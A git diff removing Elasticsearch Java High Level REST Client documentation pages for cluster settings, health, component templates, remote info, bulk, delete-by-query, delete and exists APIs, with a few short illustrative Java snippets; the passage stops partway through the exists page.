b/docs/java-rest/high-level/cluster/get_settings.asciidoc deleted file mode 100644 index 407d33f8fc8..00000000000 --- a/docs/java-rest/high-level/cluster/get_settings.asciidoc +++ /dev/null @@ -1,63 +0,0 @@ --- -:api: get-settings -:request: ClusterGetSettingsRequest -:response: ClusterGetSettingsResponse --- - -[id="{upid}-{api}"] -=== Cluster Get Settings API - -The Cluster Get Settings API allows to get the cluster wide settings. 
- -[id="{upid}-{api}-request"] -==== Cluster Get Settings Request - -A +{request}+: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-includeDefaults] --------------------------------------------------- -<1> By default only those settings that were explicitly set are returned. Setting this to true also returns -the default settings. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-local] --------------------------------------------------- -<1> By default the request goes to the master of the cluster to get the latest results. If local is specified it gets -the results from whichever node the request goes to. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Cluster Get Settings Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Get the persistent settings. -<2> Get the transient settings. -<3> Get the default settings (returns empty settings if `includeDefaults` was not set to `true`). -<4> Get the value as a `String` for a particular setting. The order of searching is first in `persistentSettings` then in -`transientSettings` and finally, if not found in either, in `defaultSettings`. - diff --git a/docs/java-rest/high-level/cluster/health.asciidoc b/docs/java-rest/high-level/cluster/health.asciidoc deleted file mode 100644 index 06163fca52d..00000000000 --- a/docs/java-rest/high-level/cluster/health.asciidoc +++ /dev/null @@ -1,177 +0,0 @@ --- -:api: health -:request: ClusterHealthRequest -:response: ClusterHealthResponse --- - -[id="{upid}-{api}"] -=== Cluster Health API - -The Cluster Health API allows getting cluster health. - -[id="{upid}-{api}-request"] -==== Cluster Health Request - -A +{request}+: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -There are no required parameters. By default, the client will check all indices and will not wait -for any events. 
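For example, executing such a default request through a `RestHighLevelClient` (assumed here to be available as `client`) might look like this minimal sketch:

[source,java]
--------------------------------------------------
// A default request reports the health of the whole cluster
ClusterHealthRequest request = new ClusterHealthRequest();
ClusterHealthResponse response = client.cluster()
        .health(request, RequestOptions.DEFAULT);

ClusterHealthStatus status = response.getStatus(); // GREEN, YELLOW or RED
--------------------------------------------------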
- -==== Indices - -Indices which should be checked can be passed in the constructor: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indices-ctr] --------------------------------------------------- - -Or using the corresponding setter method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indices-setter] --------------------------------------------------- - -==== Other parameters - -Other parameters can be passed only through setter methods: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout for the request as a `TimeValue`. Defaults to 30 seconds -<2> As a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-master-timeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue`. Defaults to the same as `timeout` -<2> As a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-wait-status] --------------------------------------------------- -<1> The status to wait (e.g. `green`, `yellow`, or `red`). Accepts a `ClusterHealthStatus` value. -<2> Using predefined method - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-wait-events] --------------------------------------------------- -<1> The priority of the events to wait for. Accepts a `Priority` value. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-level] --------------------------------------------------- -<1> The level of detail of the returned health information. Accepts a +{request}.Level+ value. -Default value is `cluster`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-wait-relocation] --------------------------------------------------- -<1> Wait for 0 relocating shards. Defaults to `false` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-wait-initializing] --------------------------------------------------- -<1> Wait for 0 initializing shards. Defaults to `false` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-wait-nodes] --------------------------------------------------- -<1> Wait for `N` nodes in the cluster. 
Defaults to `0`
-<2> Using `>=N`, `<=N`, `>N` and `<N` notation
-<3> Using `ge(N)`, `le(N)`, `gt(N)`, `lt(N)` notation
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request-wait-active]
--------------------------------------------------
-
-<1> Wait for all shards to be active in the cluster
-<2> Wait for `N` shards to be active in the cluster
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request-local]
--------------------------------------------------
-<1> A non-master node can be used for this request. Defaults to `false`
-
-include::../execution.asciidoc[]
-
-[id="{upid}-{api}-response"]
-==== Cluster Health Response
-
-The returned +{response}+ contains the following information about the
-cluster:
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-response-general]
--------------------------------------------------
-<1> Name of the cluster
-<2> Cluster status (`green`, `yellow` or `red`)
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-response-request-status]
--------------------------------------------------
-<1> Whether the request timed out while processing
-<2> Status of the request (`OK` or `REQUEST_TIMEOUT`). Other errors are thrown as exceptions
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-response-nodes]
--------------------------------------------------
-<1> Number of nodes in the cluster
-<2> Number of data nodes in the cluster
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-response-shards]
--------------------------------------------------
-<1> Number of active shards
-<2> Number of primary active shards
-<3> Number of relocating shards
-<4> Number of initializing shards
-<5> Number of unassigned shards
-<6> Number of unassigned shards that are currently being delayed
-<7> Percentage of active shards
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-response-task]
--------------------------------------------------
-<1> Maximum wait time of all tasks in the queue
-<2> Number of currently pending tasks
-<3> Number of async fetches that are currently ongoing
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-response-indices]
--------------------------------------------------
-<1> Detailed information about indices in the cluster
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-response-index]
--------------------------------------------------
-<1> Detailed information about a specific index
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-response-shard-details]
--------------------------------------------------
-<1> Detailed information about a specific shard
\ No newline at end of file
diff --git a/docs/java-rest/high-level/cluster/put_component_template.asciidoc b/docs/java-rest/high-level/cluster/put_component_template.asciidoc
deleted file mode 100644
index 10858f3b4fa..00000000000
--- a/docs/java-rest/high-level/cluster/put_component_template.asciidoc
+++ /dev/null
@@ -1,64 +0,0 @@
---
-:api: put-component-template
-:request: PutComponentTemplateRequest
-:response: AcknowledgedResponse
---
-
-[id="{upid}-{api}"]
-=== Put Component Template API
-
-The Put Component Template API allows you to create or update a component template.
-
-[id="{upid}-{api}-request"]
-==== Put Component Template Request
-
-A +{request}+ specifies the name of the component template and the template definition,
-which can consist of the settings, mappings or aliases, together with a version (which
-can be used to simplify component template management by external systems) and a metadata
-map consisting of user-specific information.
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request]
--------------------------------------------------
-<1> The name of the component template
-<2> Template configuration containing the settings, mappings and aliases for this component template
-
-===== Version
-A component template can optionally specify a version number which can be used to simplify template
-management by external systems.
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request-version]
--------------------------------------------------
-<1> The version number of the template
-
-==== Optional arguments
-The following arguments can optionally be provided:
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request-create]
--------------------------------------------------
-<1> Force the request to only create a new template; fail instead of overwriting an existing template
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request-masterTimeout]
--------------------------------------------------
-<1> Timeout to connect to the master node as a `TimeValue`
-
-include::../execution.asciidoc[]
-
-[id="{upid}-{api}-response"]
-==== Put Component Template Response
-
-The returned +{response}+ allows you to retrieve information about the
-executed operation as follows:
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-response]
--------------------------------------------------
-<1> Indicates whether all of the nodes have acknowledged the request
diff --git a/docs/java-rest/high-level/cluster/put_settings.asciidoc b/docs/java-rest/high-level/cluster/put_settings.asciidoc
deleted file mode 100644
index bc9abc62456..00000000000
--- a/docs/java-rest/high-level/cluster/put_settings.asciidoc
+++ /dev/null
@@ -1,93 +0,0 @@
---
-:api: put-settings
-:request: ClusterUpdateSettingsRequest
-:response: ClusterUpdateSettingsResponse
---
-
-[id="{upid}-{api}"]
-=== Cluster Update Settings API
-
-The Cluster Update Settings API allows you to update cluster-wide settings.
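
Before the step-by-step breakdown below, here is a minimal, untested sketch of one plausible
end-to-end call. The setting key and the `client` variable are illustrative assumptions rather
than part of the original page:

["source","java"]
--------------------------------------------------
// Build a request that applies one transient, cluster-wide setting
ClusterUpdateSettingsRequest request = new ClusterUpdateSettingsRequest();
request.transientSettings(Settings.builder()
        .put("indices.recovery.max_bytes_per_sec", "50mb")   // example setting, assumed
        .build());
// Execute synchronously with an existing RestHighLevelClient
ClusterUpdateSettingsResponse response =
        client.cluster().putSettings(request, RequestOptions.DEFAULT);
--------------------------------------------------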
- -[id="{upid}-{api}-request"] -==== Cluster Update Settings Request - -A +{request}+: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -==== Cluster Settings -At least one setting to be updated must be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-cluster-settings] --------------------------------------------------- -<1> Sets the transient settings to be applied -<2> Sets the persistent setting to be applied - -==== Providing the Settings -The settings to be applied can be provided in different ways: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-create-settings] --------------------------------------------------- -<1> Creates a transient setting as `Settings` -<2> Creates a persistent setting as `Settings` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-settings-builder] --------------------------------------------------- -<1> Settings provided as `Settings.Builder` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-settings-source] --------------------------------------------------- -<1> Settings provided as `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-settings-map] --------------------------------------------------- -<1> Settings provided as a `Map` - -==== Optional Arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the settings were applied -as a `TimeValue` -<2> Timeout to wait for the all the nodes to acknowledge the settings were applied -as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Cluster Update Settings Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request -<2> Indicates which transient settings have been applied -<3> Indicates which persistent settings have been applied diff --git a/docs/java-rest/high-level/cluster/remote_info.asciidoc b/docs/java-rest/high-level/cluster/remote_info.asciidoc deleted file mode 100644 index 6496a04a3a7..00000000000 --- a/docs/java-rest/high-level/cluster/remote_info.asciidoc +++ /dev/null 
@@ -1,32 +0,0 @@ --- -:api: remote-info -:request: RemoteInfoRequest -:response: RemoteInfoResponse --- - -[id="{upid}-{api}"] -=== Remote Cluster Info API - -The Remote cluster info API allows to get all of the configured remote cluster information. - -[id="{upid}-{api}-request"] -==== Remote Cluster Info Request - -A +{request}+: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -There are no required parameters. - -==== Remote Cluster Info Response - -The returned +{response}+ allows to retrieve remote cluster information. -It returns connection and endpoint information keyed by the configured remote cluster alias. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- diff --git a/docs/java-rest/high-level/document/bulk.asciidoc b/docs/java-rest/high-level/document/bulk.asciidoc deleted file mode 100644 index 061516388c4..00000000000 --- a/docs/java-rest/high-level/document/bulk.asciidoc +++ /dev/null @@ -1,217 +0,0 @@ --- -:api: bulk -:request: BulkRequest -:response: BulkResponse --- - -[id="{upid}-{api}"] -=== Bulk API - -NOTE: The Java High Level REST Client provides the -<<{upid}-{api}-processor>> to assist with bulk requests. - -[id="{upid}-{api}-request"] -==== Bulk Request - -A +{request}+ can be used to execute multiple index, update and/or delete -operations using a single request. - -It requires at least one operation to be added to the Bulk request: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Creates the +{request}+ -<2> Adds a first `IndexRequest` to the Bulk request. See <<{upid}-index>> for -more information on how to build `IndexRequest`. -<3> Adds a second `IndexRequest` -<4> Adds a third `IndexRequest` - -WARNING: The Bulk API supports only documents encoded in JSON or SMILE. -Providing documents in any other format will result in an error. - -And different operation types can be added to the same +{request}+: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-with-mixed-operations] --------------------------------------------------- -<1> Adds a `DeleteRequest` to the +{request}+. See <<{upid}-delete>> -for more information on how to build `DeleteRequest`. -<2> Adds an `UpdateRequest` to the +{request}+. See <<{upid}-update>> -for more information on how to build `UpdateRequest`. 
-<3> Adds an `IndexRequest` using the SMILE format - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the bulk request to be performed as a `TimeValue` -<2> Timeout to wait for the bulk request to be performed as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-refresh] --------------------------------------------------- -<1> Refresh policy as a `WriteRequest.RefreshPolicy` instance -<2> Refresh policy as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-active-shards] --------------------------------------------------- -<1> Sets the number of shard copies that must be active before proceeding with -the index/update/delete operations. -<2> Number of shard copies provided as a `ActiveShardCount`: can be -`ActiveShardCount.ALL`, `ActiveShardCount.ONE` or -`ActiveShardCount.DEFAULT` (default) - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-pipeline] --------------------------------------------------- -<1> Global pipelineId used on all sub requests, unless overridden on a sub request - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-routing] --------------------------------------------------- -<1> Global routingId used on all sub requests, unless overridden on a sub request - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-index-type] --------------------------------------------------- -<1> A bulk request with a global index used on all sub requests, unless overridden on a sub request. -This parameter is @Nullable and can only be set during +{request}+ creation. 
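
Putting the pieces above together, a minimal sketch might look like the following. The index
name, document ids and field values are made up for illustration, and `client` is assumed to be
an existing `RestHighLevelClient`:

["source","java"]
--------------------------------------------------
BulkRequest request = new BulkRequest();
// Two index operations sent in a single round trip
request.add(new IndexRequest("posts").id("1")
        .source(XContentType.JSON, "field", "foo"));
request.add(new IndexRequest("posts").id("2")
        .source(XContentType.JSON, "field", "bar"));
// Optional arguments described above
request.timeout(TimeValue.timeValueMinutes(2));
request.setRefreshPolicy(WriteRequest.RefreshPolicy.WAIT_UNTIL);
// Execute synchronously
BulkResponse bulkResponse = client.bulk(request, RequestOptions.DEFAULT);
--------------------------------------------------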
- -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Bulk Response - -The returned +{response}+ contains information about the executed operations and - allows to iterate over each result as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Iterate over the results of all operations -<2> Retrieve the response of the operation (successful or not), can be -`IndexResponse`, `UpdateResponse` or `DeleteResponse` which can all be seen as -`DocWriteResponse` instances -<3> Handle the response of an index operation -<4> Handle the response of a update operation -<5> Handle the response of a delete operation - -The Bulk response provides a method to quickly check if one or more operation -has failed: -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-has-failures] --------------------------------------------------- -<1> This method returns `true` if at least one operation failed - -In such situation it is necessary to iterate over all operation results in order -to check if the operation failed, and if so, retrieve the corresponding failure: -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-errors] --------------------------------------------------- -<1> Indicate if a given operation failed -<2> Retrieve the failure of the failed operation - -[id="{upid}-{api}-processor"] -==== Bulk Processor - -The `BulkProcessor` simplifies the usage of the Bulk API by providing -a utility class that allows index/update/delete operations to be -transparently executed as they are added to the processor. - -In order to execute the requests, the `BulkProcessor` requires the following -components: - -`RestHighLevelClient`:: This client is used to execute the +{request}+ -and to retrieve the `BulkResponse` -`BulkProcessor.Listener`:: This listener is called before and after -every +{request}+ execution or when a +{request}+ failed - -Then the `BulkProcessor.builder` method can be used to build a new -`BulkProcessor`: -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-processor-init] --------------------------------------------------- -<1> Create the `BulkProcessor.Listener` -<2> This method is called before each execution of a +{request}+ -<3> This method is called after each execution of a +{request}+ -<4> This method is called when a +{request}+ failed -<5> Create the `BulkProcessor` by calling the `build()` method from -the `BulkProcessor.Builder`. The `RestHighLevelClient.bulkAsync()` -method will be used to execute the +{request}+ under the hood. 
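
As a rough sketch of that wiring (the listener bodies are left empty here, and `client` is
assumed to be an existing `RestHighLevelClient`):

["source","java"]
--------------------------------------------------
BulkProcessor.Listener listener = new BulkProcessor.Listener() {
    @Override
    public void beforeBulk(long executionId, BulkRequest request) {
        // called before each bulk request is executed
    }

    @Override
    public void afterBulk(long executionId, BulkRequest request, BulkResponse response) {
        // called after each bulk request completes
    }

    @Override
    public void afterBulk(long executionId, BulkRequest request, Throwable failure) {
        // called when a bulk request could not be sent
    }
};

BulkProcessor bulkProcessor = BulkProcessor.builder(
        (request, bulkListener) ->
                client.bulkAsync(request, RequestOptions.DEFAULT, bulkListener),
        listener).build();
--------------------------------------------------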
- -The `BulkProcessor.Builder` provides methods to configure how the -`BulkProcessor` should handle requests execution: -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-processor-options] --------------------------------------------------- -<1> Set when to flush a new bulk request based on the number of -actions currently added (defaults to 1000, use -1 to disable it) -<2> Set when to flush a new bulk request based on the size of -actions currently added (defaults to 5Mb, use -1 to disable it) -<3> Set the number of concurrent requests allowed to be executed -(default to 1, use 0 to only allow the execution of a single request) -<4> Set a flush interval flushing any +{request}+ pending if the -interval passes (defaults to not set) -<5> Set a constant back off policy that initially waits for 1 second -and retries up to 3 times. See `BackoffPolicy.noBackoff()`, -`BackoffPolicy.constantBackoff()` and `BackoffPolicy.exponentialBackoff()` -for more options. - -Once the `BulkProcessor` is created requests can be added to it: -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-processor-add] --------------------------------------------------- - -The requests will be executed by the `BulkProcessor`, which takes care of -calling the `BulkProcessor.Listener` for every bulk request. - -The listener provides methods to access to the +{request}+ and the +{response}+: -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-processor-listener] --------------------------------------------------- -<1> Called before each execution of a +{request}+, this method allows to know -the number of operations that are going to be executed within the +{request}+ -<2> Called after each execution of a +{request}+, this method allows to know if -the +{response}+ contains errors -<3> Called if the +{request}+ failed, this method allows to know -the failure - -Once all requests have been added to the `BulkProcessor`, its instance needs to -be closed using one of the two available closing methods. - -The `awaitClose()` method can be used to wait until all requests have been -processed or the specified waiting time elapses: -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-processor-await] --------------------------------------------------- -<1> The method returns `true` if all bulk requests completed and `false` if the -waiting time elapsed before all the bulk requests completed - -The `close()` method can be used to immediately close the `BulkProcessor`: -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-processor-close] --------------------------------------------------- - -Both methods flush the requests added to the processor before closing the -processor and also forbid any new request to be added to it. 
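
For example, a typical add-and-shutdown sequence might look like the following sketch. The
document and the 30-second wait are illustrative assumptions, and `bulkProcessor` is the
instance built above:

["source","java"]
--------------------------------------------------
// Hand a request to the processor; it is flushed according to the configured thresholds
bulkProcessor.add(new IndexRequest("posts").id("1")
        .source(XContentType.JSON, "user", "kimchy"));

// Flush outstanding requests and wait up to 30 seconds for them to complete
// (awaitClose declares InterruptedException)
boolean terminated = bulkProcessor.awaitClose(30L, TimeUnit.SECONDS);
--------------------------------------------------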
diff --git a/docs/java-rest/high-level/document/delete-by-query.asciidoc b/docs/java-rest/high-level/document/delete-by-query.asciidoc
deleted file mode 100644
index f4ef87741e6..00000000000
--- a/docs/java-rest/high-level/document/delete-by-query.asciidoc
+++ /dev/null
@@ -1,131 +0,0 @@
---
-:api: delete-by-query
-:request: DeleteByQueryRequest
-:response: DeleteByQueryResponse
---
-
-[id="{upid}-{api}"]
-=== Delete By Query API
-
-[id="{upid}-{api}-request"]
-==== Delete By Query Request
-
-A +{request}+ can be used to delete documents from an index. It requires an
-existing index (or a set of indices) on which the deletion is to be performed.
-
-The simplest form of a +{request}+ looks like this and deletes all documents
-in an index:
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request]
--------------------------------------------------
-<1> Creates the +{request}+ on a set of indices.
-
-By default version conflicts abort the +{request}+ process, but you can count
-them instead with this:
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request-conflicts]
--------------------------------------------------
-<1> Set `proceed` on version conflict
-
-You can limit the documents by adding a query.
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request-query]
--------------------------------------------------
-<1> Only delete documents which have field `user` set to `kimchy`
-
-It’s also possible to limit the number of processed documents by setting `maxDocs`.
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request-maxDocs]
--------------------------------------------------
-<1> Only delete 10 documents
-
-By default +{request}+ uses batches of 1000. You can change the batch size
-with `setBatchSize`.
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request-scrollSize]
--------------------------------------------------
-<1> Use batches of 100 documents
-
-+{request}+ can also be parallelized using `sliced-scroll` with `setSlices`:
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request-slices]
--------------------------------------------------
-<1> Set the number of slices to use
-
-+{request}+ uses the `scroll` parameter to control how long it keeps the
-"search context" alive.
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request-scroll]
--------------------------------------------------
-<1> Set the scroll time
-
-If you provide routing then the routing is copied to the scroll query, limiting the process to the shards that match
-that routing value.
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-routing] --------------------------------------------------- -<1> set routing - - -==== Optional arguments -In addition to the options above the following arguments can optionally be also provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the delete by query request to be performed as a `TimeValue` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-refresh] --------------------------------------------------- -<1> Refresh index after calling delete by query - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Set indices options - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Delete By Query Response - -The returned +{response}+ contains information about the executed operations and -allows to iterate over each result as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Get total time taken -<2> Check if the request timed out -<3> Get total number of docs processed -<4> Number of docs that were deleted -<5> Number of batches that were executed -<6> Number of skipped docs -<7> Number of version conflicts -<8> Number of times request had to retry bulk index operations -<9> Number of times request had to retry search operations -<10> The total time this request has throttled itself not including the current throttle time if it is currently sleeping -<11> Remaining delay of any current throttle sleep or 0 if not sleeping -<12> Failures during search phase -<13> Failures during bulk index operation diff --git a/docs/java-rest/high-level/document/delete.asciidoc b/docs/java-rest/high-level/document/delete.asciidoc deleted file mode 100644 index 60da9d52787..00000000000 --- a/docs/java-rest/high-level/document/delete.asciidoc +++ /dev/null @@ -1,90 +0,0 @@ --- -:api: delete -:request: DeleteRequest -:response: DeleteResponse --- - -[id="{upid}-{api}"] -=== Delete API - -[id="{upid}-{api}-request"] -==== Delete Request - -A +{request}+ has two required arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Index -<2> Document id - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-routing] --------------------------------------------------- -<1> Routing value - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for primary shard to become available as a 
`TimeValue`
-<2> Timeout to wait for primary shard to become available as a `String`
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request-refresh]
--------------------------------------------------
-<1> Refresh policy as a `WriteRequest.RefreshPolicy` instance
-<2> Refresh policy as a `String`
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request-version]
--------------------------------------------------
-<1> Version
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request-version-type]
--------------------------------------------------
-<1> Version type
-
-include::../execution.asciidoc[]
-
-[id="{upid}-{api}-response"]
-==== Delete Response
-
-The returned +{response}+ allows you to retrieve information about the executed
-operation as follows:
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-response]
--------------------------------------------------
-<1> Handle the situation where the number of successful shards is less than the
-total number of shards
-<2> Handle the potential failures
-
-
-It is also possible to check whether the document was found or not:
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-notfound]
--------------------------------------------------
-<1> Do something if the document to be deleted was not found
-
-If there is a version conflict, an `ElasticsearchException` will
-be thrown:
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-conflict]
--------------------------------------------------
-<1> The raised exception indicates that a version conflict error was returned
-
diff --git a/docs/java-rest/high-level/document/exists.asciidoc b/docs/java-rest/high-level/document/exists.asciidoc
deleted file mode 100644
index 7ca3b82fb86..00000000000
--- a/docs/java-rest/high-level/document/exists.asciidoc
+++ /dev/null
@@ -1,37 +0,0 @@
---
-:api: exists
-:request: GetRequest
-:response: boolean
---
-
-[id="{upid}-{api}"]
-=== Exists API
-
-The exists API returns `true` if a document exists, and `false` otherwise.
-
-[id="{upid}-{api}-request"]
-==== Exists Request
-
-It uses +{request}+ just like the <<{upid}-get,Get API>>.
-All of its <<{upid}-get-request-optional-arguments,optional arguments>>
-are supported. Since `exists()` only returns `true` or `false`, we recommend
-turning off fetching `_source` and any stored fields so the request is
-slightly lighter:
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request]
